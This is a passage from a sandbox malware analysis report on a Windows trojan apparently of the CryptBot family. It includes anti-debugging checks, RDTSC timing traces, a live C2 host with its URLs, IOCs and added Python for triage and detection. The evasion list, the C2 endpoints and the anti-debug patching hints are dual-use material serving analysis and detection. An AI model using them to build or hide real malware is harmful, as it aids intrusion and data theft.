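    r"Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30BC4 second address: 6F30BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov bx, 3560h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+0Ch] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FB6E8B0C7F0h 0x00000017 mov ax, 62C1h 0x0000001b popad 0x0000001c rdtsc",
    r"Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30BEB second address: 6F30C0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEDDh 0x00000008 movzx ecx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 mov edi, 0C1CB81Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 mov eax, edx 0x0000001b rdtsc",
    r"Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30C56 second address: 6F30C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30C5A second address: 6F30C6D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc",
    r"Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6F30C6D second address: 6F30C77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 2785B46Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc",
    r"Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | RDTSC instruction interceptor: First address: 6FA0B39 second address: 6FA0B9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FB758EE0587h 0x0000000e pushad 0x0000000f pushad 0x00000010 movsx edi, si 0x00000013 call 00007FB6E8B0AEE4h 0x00000018 pop eax 0x00000019 popad 0x0000001a pushfd 0x0000001b jmp 00007FB6E8B0AEDBh 0x00000020 xor ecx, 44903D9Eh 0x00000026 jmp 00007FB6E8B0AEE9h 0x0000002b popfd 0x0000002c popad 0x0000002d sub ecx, ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FB6E8B0AEDAh 0x00000036 rdtsc",
]

ENTRY_RE = re.compile(
    r"RDTSC instruction interceptor: First address: (?P<first>[0-9A-Fa-f]+) "
    r"second address: (?P<second>[0-9A-Fa-f]+) instructions: (?P<body>.*)$"
)
# One "0xNNNNNNNN mnemonic operands" item; operands run up to the next offset or end of line.
INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8}) (.*?)(?= 0x[0-9A-Fa-f]{8} |$)")

# Register/stack shuffling and unconditional jumps burn cycles between the two reads
# without consuming the value.  Heuristic set chosen for this example (assumption).
SHUFFLE = {"push", "pop", "pushad", "popad", "pushfd", "popfd", "jmp",
           "mov", "movzx", "movsx", "xchg", "nop"}


@dataclass
class RdtscPair:
    first: int    # address of the first rdtsc
    second: int   # address of the next rdtsc
    insns: list   # [(offset, "mnemonic operands"), ...]; rdtsc is first and last

    @property
    def span(self) -> int:
        return self.second - self.first

    @property
    def filler(self) -> list:
        return [text for _, text in self.insns[1:-1]]

    @property
    def logic_mnemonics(self) -> set:
        """Filler mnemonics that do real work (compare, arithmetic, call, conditional jump)."""
        return {t.split()[0] for t in self.filler} - SHUFFLE

    @property
    def is_pure_junk(self) -> bool:
        return not self.logic_mnemonics


def parse_entry(line: str):
    """Return an RdtscPair for one report line, or None if the line is not such an entry."""
    m = ENTRY_RE.search(line)
    if not m:
        return None
    insns = [(int(off, 16), text.strip()) for off, text in INSN_RE.findall(m["body"])]
    if len(insns) < 2 or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        return None
    return RdtscPair(int(m["first"], 16), int(m["second"], 16), insns)


def chains(pairs):
    """Link entries whose second address is another entry's first address.

    Returns one list of rdtsc site addresses per chain, in execution order; a long
    chain means the code samples the counter many times in a row.
    """
    by_first = {p.first: p for p in pairs}
    seconds = {p.second for p in pairs}
    result = []
    for start in (p for p in pairs if p.first not in seconds):
        chain, cur, seen = [start.first], start, set()
        while cur is not None and cur.first not in seen:   # `seen` guards against a loop
            seen.add(cur.first)
            chain.append(cur.second)
            cur = by_first.get(cur.second)
        result.append(chain)
    return result


def summarize(lines):
    """Triage view: how many pairs, how long the chains are, and where the logic sits."""
    pairs = [p for p in map(parse_entry, lines) if p is not None]
    return {
        "pairs": len(pairs),
        "chains": sorted((len(c) for c in chains(pairs)), reverse=True),
        "junk_only": sum(p.is_pure_junk for p in pairs),
        "logic_sites": {hex(p.first): sorted(p.logic_mnemonics)
                        for p in pairs if not p.is_pure_junk},
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Feeding all 31 entries from this report through `summarize` instead of the seven sample lines gives one chain of 25 consecutive rdtsc sites in the 6FA09xx-6FA0Bxx range, which is the region to look at first when deciding where the timing comparison lives; the `logic_sites` entries (the pairs carrying `test`, `sbb`, `je`, `xor`, `call`) are the candidate patch points when preparing a sample for a debugger.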

Anti Debugging

Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | File opened: NTICE
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | File opened: SICE
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Code function: 2_2_00FD9980 rdtsc 2_2_00FD9980
Source: ZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: AProgram Manager
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.6:49720 -> 81.29.149.125:80
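The network side of this report is thin but distinctive: a GET to https://httpbin.org/ip (the sample learning its external address), then traffic to home.fiveth5ht.top on 81.29.149.125:80 with paths built from one token, /OyKvQKriwnyyWjwCxSXF1735186862, carrying either a short suffix or an ?argument= query, and flagged under "HTTP GET or POST without a user agent". The Python below is an added example, not part of the report, of turning that into a proxy-log detection: for each client it looks for an external-IP lookup followed within a short window by user-agent-less requests whose path starts with a 20-letter-plus-10-digit token. The log lines and their field layout are constructed for the example; the token regex, the list of external-IP services and the 120-second window are assumptions; and the decoding of the 10-digit suffix as a Unix epoch is this example's own observation (it gives 2024-12-26 04:21:02 UTC, two days before the analysis date), not something the report states.

```python
"""Proxy-log detection for the external-IP lookup followed by user-agent-less beaconing
seen in this report.  Added example; the log below is constructed, not from the PCAP."""
import re
from datetime import datetime, timezone

# Constructed log (assumed layout): time client method host path user_agent
# "-" marks a request sent without a User-Agent header.  Client .6 mirrors the report's
# indicators; client .7 is benign noise to show the rule stays quiet on it.
SAMPLE_LOG = """\
2024-12-28T08:53:30Z 192.168.2.6 GET httpbin.org /ip -
2024-12-28T08:53:31Z 192.168.2.6 POST home.fiveth5ht.top /OyKvQKriwnyyWjwCxSXF1735186862?argument=0 -
2024-12-28T08:53:40Z 192.168.2.6 GET home.fiveth5ht.top /OyKvQKriwnyyWjwCxSXF17351868624fd4 -
2024-12-28T08:55:02Z 192.168.2.7 GET www.bing.com /search?q=x Mozilla/5.0
2024-12-28T08:57:10Z 192.168.2.7 GET httpbin.org /ip curl/8.4.0
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (.+)$")
EXTERNAL_IP_SERVICES = {("httpbin.org", "/ip")}      # assumption: extend with other such endpoints
TOKEN_RE = re.compile(r"^/([A-Za-z]{20})(\d{10})")     # assumed shape of the C2 path token
WINDOW_SECONDS = 120                                   # assumption: lookup and beacon are seconds apart
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, client, method, host, path, ua = m.groups()
        yield {
            "ts": datetime.strptime(ts, TS_FMT).replace(tzinfo=timezone.utc),
            "client": client, "method": method, "host": host, "path": path,
            "no_ua": ua == "-",
        }


def detect(text):
    """One alert per (client, host) where an external-IP lookup is followed, within
    WINDOW_SECONDS, by user-agent-less requests to a token-shaped path."""
    events = sorted(parse_log(text), key=lambda e: e["ts"])
    last_lookup = {}   # client -> time of its most recent external-IP lookup
    alerts = {}        # (client, host) -> alert
    for e in events:
        if (e["host"], e["path"].split("?", 1)[0]) in EXTERNAL_IP_SERVICES:
            last_lookup[e["client"]] = e["ts"]
            continue
        m = TOKEN_RE.match(e["path"])
        lookup = last_lookup.get(e["client"])
        if not (m and e["no_ua"] and lookup is not None):
            continue
        if (e["ts"] - lookup).total_seconds() > WINDOW_SECONDS:
            continue
        letters, digits = m.group(1), m.group(2)
        alert = alerts.setdefault((e["client"], e["host"]), {
            "client": e["client"],
            "host": e["host"],
            "token": letters + digits,
            # Treating the digits as a Unix epoch is an observation of this example, not of the report.
            "token_epoch_utc": datetime.fromtimestamp(int(digits), tz=timezone.utc).strftime(TS_FMT),
            "first_seen": e["ts"].strftime(TS_FMT),
            "requests_without_ua": 0,
            "methods": set(),
        })
        alert["requests_without_ua"] += 1
        alert["methods"].add(e["method"])
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a)
```

The lookup-then-beacon ordering is what keeps the rule from firing on the benign client: plenty of legitimate tools query httpbin.org/ip, and a single user-agent-less request is not unusual on its own, but the two in sequence from one host, with the beacon path in this shape, are the combination this report shows.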
MITRE ATT&CK Matrix

Techniques are listed per tactic. A leading number is the count of signatures that matched the technique; entries without a number are the remaining cells of the matrix with no match.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 23 Virtualization/Sandbox Evasion; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 751 Security Software Discovery; 23 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Remote System Discovery; 1 File and Directory Discovery; 216 System Information Discovery
Lateral Movement: 1 Exploitation of Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 11 Archive Collected Data; 1 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 2 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
ZFttiy4Tt8.exe | 56% | Virustotal | -
ZFttiy4Tt8.exe | 61% | ReversingLabs | Win32.Trojan.CryptBot
ZFttiy4Tt8.exe | 100% | Avira | TR/Crypt.TPM.Gen
ZFttiy4Tt8.exe | 100% | Joe Sandbox ML | -

Dropped Files: No Antivirus matches
Unpacked PE Files: No Antivirus matches
Domains: No Antivirus matches

URLs
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument= | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4 | 0% | Avira URL Cloud | safe
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 81.29.149.125 | true | false | - | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | - | high
httpbin.org | 3.218.7.103 | true | false | - | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | - | high
https://httpbin.org/ip | false | - | high

URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://html4/loose.dtd | ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/alt-svc.html# | ZFttiy4Tt8.exe | false | - | high
https://httpbin.org/ipbefore | ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/http-cookies.html | ZFttiy4Tt8.exe, ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/hsts.html# | ZFttiy4Tt8.exe | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963 | ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868624fd4 | ZFttiy4Tt8.exe, 00000002.00000002.2285359627.0000000000869000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249242290.0000000000867000.00000004.00000020.00020000.00000000.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2249195460.0000000000862000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://.css | ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument= | ZFttiy4Tt8.exe, 00000002.00000002.2289092739.0000000007510000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://.jpg | ZFttiy4Tt8.exe, 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmp, ZFttiy4Tt8.exe, 00000002.00000003.2150840984.00000000071D0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
81.29.149.125 | home.fiveth5ht.top | Switzerland (CH) | 39616 | COMUNICA_IT_SERVICES | false
3.218.7.103 | httpbin.org | United States (US) | 14618 | AMAZON-AES | false
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581610
Start date and time: 2024-12-28 09:52:32 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: ZFttiy4Tt8.exe (renamed because the original name is a hash value)
Original Sample Name: 8cb06b0904107a21706822f2f2d90832.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 40.126.53.8, 20.199.58.43, 2.16.158.33, 13.107.246.63, 20.223.36.55, 52.149.20.212, 2.16.158.170, 150.171.28.10
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:53:32 | API Interceptor | 3x Sleep call for process: ZFttiy4Tt8.exe modified
IPs seen in other analyses
Match | Associated Sample Name / URL | Detection | Threat Name | Context
81.29.149.125 | e62iSl0abZ.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | HGFSqmKwd5.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | A3nofpjN9A.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | QMtCX5RLOP.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | s8kPMNXOZY.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | GjZewfxHTi.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | sYPORwmgwQ.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | xdeRtWCeNH.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
3.218.7.103 | e62iSl0abZ.exe | malicious | Unknown | -
3.218.7.103 | A3nofpjN9A.exe | malicious | Unknown | -
3.218.7.103 | j2nLC29vCy.exe | malicious | LummaC | -
3.218.7.103 | vUcZzNWkKc.exe | malicious | LummaC | -
3.218.7.103 | GjZewfxHTi.exe | malicious | Unknown | -
3.218.7.103 | xdeRtWCeNH.exe | malicious | Unknown | -
3.218.7.103 | E205fJJS1Q.exe | malicious | LummaC | -
3.218.7.103 | w22319us3M.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | -
3.218.7.103 | QzK1LCSuq2.exe | malicious | LummaC | -
3.218.7.103 | OoYYtngD7d.exe | malicious | Unknown | -
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        httpbin.orge62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
 | vUcZzNWkKc.exe | malicious | LummaC | 3.218.7.103
 | GjZewfxHTi.exe | malicious | Unknown | 3.218.7.103
 | sYPORwmgwQ.exe | malicious | Unknown | 34.226.108.155
fp2e7a.wpc.phicdn.net | rpDOUhuBC5.exe | malicious | Credential Flusher | 192.229.221.95
 | http://volmar.sinformations.cfd | malicious | Unknown | 192.229.221.95
 | OTRykEzo6o.exe | malicious | Unknown | 192.229.221.95
 | ctfmon.exe | malicious | Unknown | 192.229.221.95
 | wce.exe | malicious | Unknown | 192.229.221.95
 | atw3.dll | malicious | Gozi, Ursnif | 192.229.221.95
 | setup.msi | malicious | Unknown | 192.229.221.95
 | ERTL09tA59.exe | malicious | LummaC | 192.229.221.95
 | vJPhYDClT5.exe | malicious | Unknown | 192.229.221.95
 | V2s8yjvIJw.exe | malicious | Iris Stealer | 192.229.221.95
home.fiveth5ht.top | e62iSl0abZ.exe | malicious | Unknown | 81.29.149.125
 | HGFSqmKwd5.exe | malicious | Unknown | 81.29.149.125
 | A3nofpjN9A.exe | malicious | Unknown | 81.29.149.125
 | QMtCX5RLOP.exe | malicious | Unknown | 81.29.149.125
 | s8kPMNXOZY.exe | malicious | Unknown | 81.29.149.125
 | GjZewfxHTi.exe | malicious | Unknown | 81.29.149.125
 | sYPORwmgwQ.exe | malicious | Unknown | 81.29.149.125
 | xdeRtWCeNH.exe | malicious | Unknown | 81.29.149.125
 | f7qbEfJl0B.exe | malicious | Unknown | 5.101.3.217
 | 5KwhHEdmM4.exe | malicious | Unknown | 5.101.3.217
ASN context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COMUNICA_IT_SERVICESCH | e62iSl0abZ.exe | malicious | Unknown | 81.29.149.125
 | HGFSqmKwd5.exe | malicious | Unknown | 81.29.149.125
 | A3nofpjN9A.exe | malicious | Unknown | 81.29.149.125
 | QMtCX5RLOP.exe | malicious | Unknown | 81.29.149.125
 | s8kPMNXOZY.exe | malicious | Unknown | 81.29.149.125
 | GjZewfxHTi.exe | malicious | Unknown | 81.29.149.125
 | sYPORwmgwQ.exe | malicious | Unknown | 81.29.149.125
 | xdeRtWCeNH.exe | malicious | Unknown | 81.29.149.125
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS | 81.29.149.45
 | hmips.elf | malicious | Unknown | 81.29.149.178
AMAZON-AESUS | e62iSl0abZ.exe | malicious | Unknown | 3.218.7.103
 | HGFSqmKwd5.exe | malicious | Unknown | 34.226.108.155
 | A3nofpjN9A.exe | malicious | Unknown | 3.218.7.103
 | QMtCX5RLOP.exe | malicious | Unknown | 34.226.108.155
 | j2nLC29vCy.exe | malicious | LummaC | 3.218.7.103
 | es5qBEFupj.exe | malicious | LummaC | 34.226.108.155
 | s8kPMNXOZY.exe | malicious | Unknown | 34.226.108.155
 | vUcZzNWkKc.exe | malicious | LummaC | 3.218.7.103
 | GjZewfxHTi.exe | malicious | Unknown | 3.218.7.103
 | sYPORwmgwQ.exe | malicious | Unknown | 34.226.108.155
                                                        No context
                                                        No context
                                                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.982091166646042
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: ZFttiy4Tt8.exe
File size: 4'528'640 bytes
MD5: 8cb06b0904107a21706822f2f2d90832
SHA1: 37dee7617a62f9a5e5853cc977a125be54ac58b7
SHA256: 05dd7b104f2c11892363053cfa4d3feed76b39614b34764ac571893b9495e2c4
SHA512: 23cfb74398c11ebb58060b2da0414008aaba5479e20790c4e7dae1325c24f34996b4ee8aff1ec4b23211be2fcfcb4f3395da117cd414ecea79adfe90ddd9ed7a
SSDEEP: 98304:x2MM2EP0mQedsJTfKVAakoJykzhZczXGozRrrM3GR7fvkoLsw/ji:x2t3Vuu3FWzWozR4GR0s3
TLSH: EC263371C9FE1507CCFBD63D087297A6C9C21F432BCE9A1C66DE85091DABB0466B3681
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@.................................w.E...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x104a000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After:
Subject Chain:
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:
Entry point disassembly (Instruction):
jmp 00007FB6E88EEECAh
psubb mm0, qword ptr [eax+eax+00h]
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
